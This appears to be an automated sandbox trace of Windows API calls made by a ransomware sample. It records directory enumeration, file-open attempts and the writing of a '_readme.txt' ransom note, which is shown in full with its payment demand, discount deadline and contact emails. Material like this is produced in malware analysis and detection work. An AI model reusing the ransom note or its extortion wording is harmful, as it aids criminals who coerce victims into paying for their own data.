(HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.915] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.915] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.915] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.915] PathFindFileNameW (pszPath="C:\\Boot\\el-GR\\") returned="el-GR\\" [0165.915] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c638 [0165.916] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0165.916] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0165.916] PathFindFileNameW (pszPath="") returned="" [0165.916] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c638 [0165.916] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0165.916] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0165.916] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x800) returned 0x3b40090 [0165.916] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b40090 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0165.916] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x810) returned 0x3b19640 [0165.916] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.916] FreeLibrary (hLibModule=0x759d0000) returned 1 [0165.916] PathAppendW (in: pszPath="C:\\Boot\\el-GR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\el-GR\\_readme.txt") returned 1 [0165.916] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.916] PathFileExistsW (pszPath="C:\\Boot\\el-GR\\_readme.txt") returned 0 [0165.917] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x7d00) returned 0x3b47e70 [0165.917] lstrcpyW (in: lpString1=0x3b47e70, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" [0165.917] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde", lpString2="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" [0165.917] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b1a750 [0165.917] CreateFileW (lpFileName="C:\\Boot\\el-GR\\_readme.txt" (normalized: "c:\\boot\\el-gr\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0165.917] FindFirstFileW (in: lpFileName="C:\\Boot\\el-GR\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0165.917] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0165.917] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea239054, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x17250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0165.917] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.917] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b44e88 [0165.917] PathFindExtensionW (pszPath="C:\\Boot\\el-GR\\bootmgr.exe.mui") returned=".mui" [0165.917] CreateFileW (lpFileName="C:\\Boot\\el-GR\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0165.918] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44e88 | out: hHeap=0xcd0000) returned 1 [0165.918] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea239054, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x17250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0165.918] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0165.918] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.918] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c908 | out: hHeap=0xcd0000) returned 1 [0165.918] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0165.918] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c908 [0165.918] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.918] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.918] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.918] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.918] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.918] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.918] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.918] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.918] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.918] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.918] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.918] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.918] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.918] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.918] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.919] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.919] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.919] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.919] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.919] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.919] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.919] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.919] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.919] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.919] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.919] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.919] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.919] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b40090 [0165.919] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.919] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.919] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.919] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.919] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.919] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.919] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.919] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.919] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.919] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.919] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.919] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.920] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.920] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.920] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.920] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.920] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.920] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.920] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.920] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.920] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.920] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.920] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.920] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.920] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.920] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.920] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.920] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.920] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.920] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.920] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.920] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.920] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.920] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.920] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.920] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.920] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.920] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.921] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.921] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.921] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.921] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.921] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.921] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.921] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.921] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.921] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.921] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.921] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.921] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.921] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.921] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.921] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.921] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.921] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.921] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.921] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.921] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.921] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.921] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.921] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.921] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.921] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.921] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.921] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.921] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.922] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.922] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.922] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.922] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.922] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.922] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.922] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.922] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.922] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.922] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b40090 [0165.922] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.922] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.922] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.922] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.922] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.922] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.922] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.922] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.922] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.922] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.922] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.922] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.922] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.922] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.922] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.922] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.922] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.922] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.923] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.923] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.923] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.923] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.923] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.923] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.923] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.923] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.923] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.923] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.923] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.923] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.923] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.923] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 